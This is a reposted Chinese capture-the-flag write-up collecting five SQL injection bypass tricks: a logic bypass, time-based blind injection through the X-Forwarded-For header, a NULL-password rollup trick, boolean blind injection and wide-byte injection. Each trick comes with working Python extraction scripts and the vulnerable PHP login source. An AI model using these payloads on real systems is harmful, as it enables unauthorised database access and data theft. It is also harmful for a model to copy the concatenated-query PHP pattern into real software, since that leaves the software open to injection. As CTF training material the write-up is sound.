碼上歡樂
相關內容    簡體    繁體

SQL花式繞過

本文轉載自   查看原文   2017-03-17 21:21   1779 

 

 

【1】 題目給出過濾了一切,測試得知沒有過濾 "\"|and|left|right"等關鍵字。重要的是不管輸入正確與否的SQL句子,總是返回想回的頁面,嘗試各種方法都是一樣的結果。

感覺只能是邏輯繞過。猜測進行驗證的代碼應該為

select * from *** where username ="" and password="";

目前用戶名和密碼沒有一個知道的。無奈中,發呆好長時間

成功繞過。

username=hello"=" & password = hello"="

拿到flag

【2】XFF基於時間無過濾注入

' or sleep(10) and ''='

延時,說明有注入

' or sleep((select length(flag) from flag)=32) and ''='

驗證flag長度為32

直接上代碼

#coding:utf-8
"""
@author: elope
"""
import requests;
maystr="0987654321qwertyuiopasdfghjklzxcvbnm."
flag=''
for j in range(33):

    for i in maystr:
        url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"
        header={
            # "X-Forwarded-For":"' +(select case when (substring((select database())from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i)  #跑數據庫的名字
            #"X-Forwarded-For":"' +(select case when (substring((select(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i)  #跑表明
            #"X-Forwarded-For":"' +(select case when (substring((select(select(group_concat(column_name))from(information_schema.columns)where(table_name=0x666C6167))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i) #跑字段名
            "X-Forwarded-For":"' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i)  #跑記錄
        }
        try:

            res=requests.get(url, headers=header,timeout=4).text
        except:

             flag+=i
             print flag
        # print res

這個代碼雙重繞過,雖然比較慢,但是准確度更高一點

import requests
import time

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
maystr="0987654321qwertyuiopasdfghjklzx{_-%!@&*^(?|)}cvbnm."
flag=''



for i in range(33):
    for j in  maystr:
        starttime = time.time()
        headers = {"X-Forwarded-For":"' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(15) else 0 end) and 'Zkkp'='Zkkp" % (i,j)}
        res = requests.get(url,headers=headers)
        if time.time()-starttime > 10:
            res = requests.get(url,headers=headers)
            if time.time()-starttime > 10:
                flag += j
                print flag
                break
        else:
            pass

直接出結果

【3】強制使密碼為空

直接上代碼吧

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "水可載舟,亦可賽艇!";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可賽艇!";
    }
}else{
    print "一顆賽艇!";
}
mysql_close($con);
?>

繞過用戶名容易 。直接使用uname = ' or 1=1 limit 1#

使返回一條 就繞過

但是需要填進去的密碼,和讀出來的密碼相同。這不是廢話么,相同的話不是直接拿到了

if($key['pwd'] == $_POST['pwd'])

發現這個。我們使讀出來的密碼為空不是可以了。

查看有幾個用戶

select * from test offset 1 limit 1; 正常

select * from test offset 1 limit 1;錯誤

 

說明只有兩行

現在需要構造一個NULL值

成功。

直接輸入 uname = admin' or 1=1 group by pwd with rollup limit 1 offset 2#&pwd=(空)

返回flag

【4】無腦洞的盲住

直接貼代碼

import requests

flag =""

for i in range(1,30):
    for j in range(33,126):
        url = "http://ctf5.shiyanbar.com/web/index_3.php?id=1'and if(ascii(substr((select flag from flag),"+str(i)+",1))="+str(j)+",1,0)%23" 

        res = requests.get(url)

        if(res.text.encode('GBK','ignore').find('Hello') != -1):
            flag += chr(int(j))
            print flag
            break
        else:
            pass

【5】njctf一道題

過濾了空格。雙字節編碼。對單引號進行編碼,對雙引號當成字符輸入,所以用16進制編碼繞過。

import string
import binascii
import requests

s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"
u = "http://218.2.197.235:23733/index.php?key=a%df'||right(left((select(flag)from(flag)),{pos}),1)=0x{c}%23"
payload = ''
for i in xrange(1, 35):
        for c in s:
                url = u.format(pos=i, c=binascii.hexlify(c))
                r = requests.get(url)
                if 'showContent' in r.content:
                        sign = 1
                        payload += c
                        print payload
                        break
        if payload[-1] == '}':
                break

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 CSRF 花式繞過Referer技巧 CSRF--花式繞過Referer技巧 sql注入繞過 sql繞過基礎 SQL Injection繞過技巧 SQL注入的繞過 SQL注入之waf繞過 SQL注入繞過技巧 SQL注入繞過技巧 sql注入繞過方法
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM